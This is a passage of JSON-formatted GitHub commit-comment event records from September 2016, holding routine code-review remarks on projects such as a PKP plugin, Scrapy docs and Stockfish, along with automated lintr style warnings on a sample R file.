~^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:8:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(txt == 'hi') 4\n    ^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:8:13:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L8) *style:* **Only use double-quotes.**\n```r\n​  if(txt == 'hi') 4\n            ^~~~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:9:4:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L9) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  5}  \n   ^\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:9:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  5}  \n    ^~\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:11:0:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L11) *error:* **unexpected end of input**\n```r\n​\n\n```\n[/tmp/atom-linter_8695CjQLVymD30Cu/bad.R:11:1:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//tmp/atom-linter_8695CjQLVymD30Cu/bad.R#L11) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-16T19:30:43Z"}
{"id":"4575929306","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059154,"position":92,"line":505,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:30:57Z","updated_at":"2016-09-16T19:30:57Z","body":"Ginormous sentence. Let's break it:\r\n\r\n\r\n> Another interesting **thing** this spider demonstrates is that, even if there are many quotes from the same author, we don't need to worry about visiting the same **author** page multiple times. **By default, Scrapy filters** out duplicated requests to URLs already visited, avoiding the problem of hitting servers too much because of a programming mistake."}},"created_at":"2016-09-16T19:30:57Z"}
{"id":"4575934071","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19059165,"position":null,"line":null,"path":null,"commit_id":"c7dcc9b845e9e8e6a869ea29bfe001b00d89a34a","created_at":"2016-09-16T19:31:57Z","updated_at":"2016-09-16T19:31:57Z","body":"++"}},"created_at":"2016-09-16T19:31:57Z"}
{"id":"4575934746","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059167,"position":34,"line":34,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:32:07Z","updated_at":"2016-09-16T19:32:07Z","body":"I know this is a work in progress but I'll comment anyway in case it helps with orientation :)\r\n\r\nWatch out for space-based indents -- we use tabs."}},"created_at":"2016-09-16T19:32:07Z"}
{"id":"4575935675","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19059169,"position":null,"line":null,"path":null,"commit_id":"bbdc3c5e8eaaeb1dd7b29c809b6ab1aeabb1d3a1","created_at":"2016-09-16T19:32:17Z","updated_at":"2016-09-16T19:32:17Z","body":"I got the code from @retrobenny . Supposedly he tested it and it seemed to work."}},"created_at":"2016-09-16T19:32:17Z"}
{"id":"4575937280","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059175,"position":27,"line":27,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:32:39Z","updated_at":"2016-09-16T19:32:39Z","body":"Now that OJS 3.0 is requiring PHP 5.x, we can reduce our use of references on objects. There are only a few places in the code now where references are required."}},"created_at":"2016-09-16T19:32:39Z"}
{"id":"4575937983","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059181,"position":25,"line":25,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:32:48Z","updated_at":"2016-09-16T19:32:48Z","body":"Needs both parameters documented."}},"created_at":"2016-09-16T19:32:48Z"}
{"id":"4575938343","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19059183,"position":null,"line":null,"path":null,"commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T19:32:52Z","updated_at":"2016-09-16T19:32:52Z","body":"Why, it isn't doing anything. "}},"created_at":"2016-09-16T19:32:52Z"}
{"id":"4575940416","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059190,"position":40,"line":441,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:33:20Z","updated_at":"2016-09-16T19:33:20Z","body":"You have to use double ticks to format as source code: ``parse()``."}},"created_at":"2016-09-16T19:33:20Z"}
{"id":"4575941898","type":"CommitCommentEvent","actor":{"login":"stummjr"},"repo":{"name":"eliasdorneles/scrapy"},"payload":{"comment":{"id":19059192,"position":40,"line":441,"path":"docs/intro/tutorial.rst","commit_id":"b2a5cddbb01e3970ce1e38e821a76c7d10520845","created_at":"2016-09-16T19:33:39Z","updated_at":"2016-09-16T19:33:39Z","body":"The same applies to other parts of the text."}},"created_at":"2016-09-16T19:33:39Z"}
{"id":"4575942811","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059194,"position":66,"line":66,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:33:50Z","updated_at":"2016-09-16T19:33:50Z","body":"OTOH `TemplateManager::getManager` has an optional `$request` parameter -- we'll need to clean this up at some point, but it's better to provide it when you have `$request` handy."}},"created_at":"2016-09-16T19:33:50Z"}
{"id":"4575944572","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19059197,"position":null,"line":null,"path":null,"commit_id":"9fea57e5d57740447f018d27ead8d3230746574d","created_at":"2016-09-16T19:34:13Z","updated_at":"2016-09-16T19:34:13Z","body":"I guess... because of double checks?\r\n\r\nNevertheless, I will delete test...since majority of times it will be one capture square."}},"created_at":"2016-09-16T19:34:13Z"}
{"id":"4575945371","type":"CommitCommentEvent","actor":{"login":"barisusakli"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19059198,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-16T19:34:23Z","updated_at":"2016-09-16T19:34:23Z","body":"Yeah that's a regression."}},"created_at":"2016-09-16T19:34:23Z"}
{"id":"4575948097","type":"CommitCommentEvent","actor":{"login":"Hoffi1"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19059206,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T19:34:57Z","updated_at":"2016-09-16T19:34:57Z","body":"Hi guys, why this unexpected change? There is no difference in content (yet) but a change in tab title - this will confuse the users without any benefit. I suggested to find and provide a better arrangement with next version (after 2.2.0) so it will change then again.\r\nEverybody can change the text using language overrides if useful.\r\nI dislike this commit. :-1: \r\n\r\nbtw: This was one reason for my idea with the lot of tabs - the difficulti to find good tab titles if some things are collected. I dreamed about 4-5 tabs but hadn't found good words."}},"created_at":"2016-09-16T19:34:57Z"}
{"id":"4575948930","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059213,"position":158,"line":158,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:35:09Z","updated_at":"2016-09-16T19:35:09Z","body":"`$this->submission` needs a `@var` declaration at the head of the class (so does `$submissionId`)."}},"created_at":"2016-09-16T19:35:09Z"}
{"id":"4575950885","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059218,"position":197,"line":197,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:35:34Z","updated_at":"2016-09-16T19:35:34Z","body":"Best to use `$this->setData` rather than accessing `$this->_data` directly."}},"created_at":"2016-09-16T19:35:34Z"}
{"id":"4575952396","type":"CommitCommentEvent","actor":{"login":"liberty-developer"},"repo":{"name":"liberty-developer/inputstream.mpd"},"payload":{"comment":{"id":19059222,"position":null,"line":null,"path":null,"commit_id":"1e2ffe3ae7e66b2990feec6c8ba37f927eb692ce","created_at":"2016-09-16T19:35:52Z","updated_at":"2016-09-16T19:35:52Z","body":"I was able to get one of these videos running. Not sure how long amazon keeps this door open.\r\nWill be pushed soon."}},"created_at":"2016-09-16T19:35:52Z"}
{"id":"4575954227","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059225,"position":1,"line":1,"path":"README.md","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:36:13Z","updated_at":"2016-09-16T19:36:13Z","body":"Resolved."}},"created_at":"2016-09-16T19:36:13Z"}
{"id":"4575958835","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059236,"position":237,"line":237,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:37:11Z","updated_at":"2016-09-16T19:37:11Z","body":"`$sectionDao->getSection` should be `$sectionDao->getById`; it's also best to provide the second optional parameter (`$contextId`, a.k.a. journal ID) just to control the risk of section IDs from other journals being used."}},"created_at":"2016-09-16T19:37:11Z"}
{"id":"4575959232","type":"CommitCommentEvent","actor":{"login":"Aaron1011"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19059237,"position":15,"line":153,"path":"src/main/java/org/spongepowered/common/event/tracking/phase/PacketPhase.java","commit_id":"54102b9c7539b55b1bbf9d778b4fd185bce1a07d","created_at":"2016-09-16T19:37:15Z","updated_at":"2016-09-16T19:37:15Z","body":"Oops - `PACKET_BUTTON_SECONDARY_ID` and `PACKET_BUTTON_MIDDLE_ID` should have an id of `1` and `2`, respectively.. I missed it because I'm only using `PACKET_BUTTON_PRIMARY_ID` atm.\r\n\r\nThe reason for these constants is that it allows certain handlers to be simplified, when a almost identical handler would otherwise be needed to fire perform the same logic, but for a different event.\r\n\r\nFor example, I use `PACKET_BUTTON_PRIMARY_ID` [here](https://github.com/SpongePowered/SpongeCommon/commit/54102b9c7539b55b1bbf9d778b4fd185bce1a07d#diff-792fb87b6e89856f78c3eee839549858R261) to determine whether to fire a `.Primary`  or `.Secondary` event. Without the constant, I would need two different handlers for - one of each of the `BUTTON_PRIMARY` and `BUTTON_SECONDARY` cases."}},"created_at":"2016-09-16T19:37:15Z"}
{"id":"4575960666","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19059240,"position":null,"line":null,"path":null,"commit_id":"bbdc3c5e8eaaeb1dd7b29c809b6ab1aeabb1d3a1","created_at":"2016-09-16T19:37:35Z","updated_at":"2016-09-16T19:37:35Z","body":"> It's GameShark cheats. The first byte is code type. 81 = 16bit write.\r\n\r\nOh well I totally missed that! Thanks for the info ;-)"}},"created_at":"2016-09-16T19:37:35Z"}
{"id":"4575961990","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059244,"position":278,"line":278,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:37:51Z","updated_at":"2016-09-16T19:37:51Z","body":"Not sure if this is still live (since you're creating a submission above), but it's best to let the DAO create the object. Use `$articleDao->newDataObject()`."}},"created_at":"2016-09-16T19:37:51Z"}
{"id":"4575964182","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059248,"position":308,"line":308,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:38:19Z","updated_at":"2016-09-16T19:38:19Z","body":"I think this is still old code, but anyway, use `$articleDao->insertObject`."}},"created_at":"2016-09-16T19:38:19Z"}
{"id":"4575966021","type":"CommitCommentEvent","actor":{"login":"mandric"},"repo":{"name":"medic/medic-reporter"},"payload":{"comment":{"id":19059251,"position":2,"line":2,"path":"README.md","commit_id":"8913ff281db7b8f8b8b4b46b88ef6ae38d4fae46","created_at":"2016-09-16T19:38:43Z","updated_at":"2016-09-16T19:38:43Z","body":"SimApps use Muvuku"}},"created_at":"2016-09-16T19:38:43Z"}
{"id":"4575966183","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19059252,"position":null,"line":null,"path":null,"commit_id":"ee719dbb55f5d6216b3f4b6a73b1d9bbfd50ea03","created_at":"2016-09-16T19:38:45Z","updated_at":"2016-09-16T19:38:45Z","body":"GL for LTC."}},"created_at":"2016-09-16T19:38:45Z"}
{"id":"4575967063","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059253,"position":66,"line":66,"path":"QuickSubmitPlugin.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:38:57Z","updated_at":"2016-09-16T19:38:57Z","body":"We don't support older PHPs, so this conditional can be removed."}},"created_at":"2016-09-16T19:38:57Z"}
{"id":"4575967816","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"AtomLinter/linter-lintr"},"payload":{"comment":{"id":19059257,"position":null,"line":null,"path":null,"commit_id":"549560db1e77f4481324b3d7f88e41c6303f0f82","created_at":"2016-09-16T19:39:08Z","updated_at":"2016-09-16T19:39:08Z","body":"[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:1:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L1) *style:* **Use <-, not =, for assignment.**\n```r\n​fun = function(one)\n    ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:2:1:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L3) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L3) *warning:* **local variable ‘one.plus.one’ assigned but may not be used**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:3:19:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L3) *warning:* **no visible binding for global variable ‘oen’, Did you mean 'one'?**\n```r\n​  one.plus.one <- oen + 1\n                  ^~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L4) *warning:* **local variable ‘newVar’ assigned but may not be used**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:4:33:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L4) *style:* **Commas should always have a space after.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n                                ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:5:7:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L5) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  four[ 1, ]\n      ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:6:10:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L6) *style:* **Only use double-quotes.**\n```r\n​  txt <- 'hi'\n         ^~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:7:3:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L7) *warning:* **local variable ‘three’ assigned but may not be used**\n```r\n​  three <- two+ 1\n  ^~~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:7:12:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L7) *warning:* **no visible binding for global variable ‘two’, Did you mean 'txt'?**\n```r\n​  three <- two+ 1\n           ^~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:7:15:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  three <- two+ 1\n             ~^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:8:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(txt == 'hi') 4\n    ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:8:13:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L8) *style:* **Only use double-quotes.**\n```r\n​  if(txt == 'hi') 4\n            ^~~~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:9:4:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L9) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  5}  \n   ^\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:9:5:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  5}  \n    ^~\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:11:0:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L11) *error:* **unexpected end of input**\n```r\n​\n\n```\n[/var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R:11:1:](https://github.com/AtomLinter/linter-lintr/blob/549560db1e77f4481324b3d7f88e41c6303f0f82//var/folders/gw/_2jq29095y7b__wtby9dg_5h0000gn/T/atom-linter_3246tmP92CTXqGsk/bad.R#L11) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-16T19:39:08Z"}
{"id":"4575968191","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19059261,"position":null,"line":null,"path":null,"commit_id":"ee719dbb55f5d6216b3f4b6a73b1d9bbfd50ea03","created_at":"2016-09-16T19:39:12Z","updated_at":"2016-09-16T19:39:12Z","body":"@mcostalba @snicolet  Good news, the test just passed :-)\r\nJust these moments I came across following idea:\r\nwhat about building up the negative of pinners bitboard? initializing npinners with full bord set and then toggling the bits where a pinners is recognized.  This could make the adapted accordingly condition in SEE maybe more cpu friendly.\r\nUnfortunately I cant speed-test this idea not before monday.."}},"created_at":"2016-09-16T19:39:12Z"}
{"id":"4575968289","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059263,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:39:13Z","updated_at":"2016-09-16T19:39:13Z","body":"You said to define variable and it's default variable but I can't see **termcase_options** or **termcase_update_terms** variables in your module instead of termcase_options I can see this variable **termcase_options_ $vocab_machine_name** in your code. It mean this file is of no use."}},"created_at":"2016-09-16T19:39:13Z"}
{"id":"4575968384","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059264,"position":81,"line":81,"path":"QuickSubmitPlugin.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:39:14Z","updated_at":"2016-09-16T19:39:14Z","body":"I use \"blee\" ;)"}},"created_at":"2016-09-16T19:39:14Z"}
{"id":"4575973164","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19059276,"position":84,"line":84,"path":"index_OLD.tpl","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-16T19:40:18Z","updated_at":"2016-09-16T19:40:18Z","body":"Have a look at some of the other form mark-up in OJS 3.0; we're now using a toolset called the \"form builder vocabulary\" that takes care of generating form markup. It's not perfect but it does mean less repeated code."}},"created_at":"2016-09-16T19:40:18Z"}
{"id":"4575973315","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059277,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:40:19Z","updated_at":"2016-09-16T19:40:19Z","body":"What is **schema** here ?"}},"created_at":"2016-09-16T19:40:19Z"}
{"id":"4575974460","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059283,"position":2,"line":2,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:40:34Z","updated_at":"2016-09-16T19:40:34Z","body":"Resolved."}},"created_at":"2016-09-16T19:40:34Z"}
{"id":"4575976828","type":"CommitCommentEvent","actor":{"login":"chrisabrams"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":19059288,"position":6,"line":330,"path":"src/lib/database/migrations.js","commit_id":"cdb3fec090c973574bba254e6a54ebe9a65c8212","created_at":"2016-09-16T19:41:02Z","updated_at":"2016-09-16T19:41:02Z","body":"@adictovirtual for the list of tables, you should use `await`[tableList](https://rethinkdb.com/api/javascript/table_list/)"}},"created_at":"2016-09-16T19:41:02Z"}
{"id":"4575978309","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059294,"position":7,"line":7,"path":"src/UpdateTerms.php","commit_id":"354d13604ed9e1ac2e22e324370541e6a160ea94","created_at":"2016-09-16T19:41:20Z","updated_at":"2016-09-16T19:41:20Z","body":"Why u removed its namespace ?"}},"created_at":"2016-09-16T19:41:20Z"}
{"id":"4575979995","type":"CommitCommentEvent","actor":{"login":"chrisabrams"},"repo":{"name":"f12/structure-api"},"payload":{"comment":{"id":19059299,"position":6,"line":330,"path":"src/lib/database/migrations.js","commit_id":"cdb3fec090c973574bba254e6a54ebe9a65c8212","created_at":"2016-09-16T19:41:41Z","updated_at":"2016-09-16T19:41:41Z","body":"Or if you are deleting all the tables, you could drop the db itself?"}},"created_at":"2016-09-16T19:41:41Z"}
{"id":"4575980296","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19059300,"position":6,"line":6,"path":"src/UpdateTerms.php","commit_id":"404cbd03e1af1d16ea6fe4f0788d18c6a07c461f","created_at":"2016-09-16T19:41:45Z","updated_at":"2016-09-16T19:41:45Z","body":"Resolved."}},"created_at":"2016-09-16T19:41:45Z"}
{"id":"4575981287","type":"CommitCommentEvent","actor":{"login":"luanfsf"},"repo":{"name":"luanfsf/ALPC-2016"},"payload":{"comment":{"id":19059305,"position":2,"line":2,"path":"sort_search/bolha_download.py","commit_id":"a6af256c1759e7737e4c7d58fef8c10da4dd2a2c","created_at":"2016-09-16T19:41:57Z","updated_at":"2016-09-16T19:41:57Z","body":"Essa versao funciona com o python 3..."}},"created_at":"2016-09-16T19:41:57Z"}
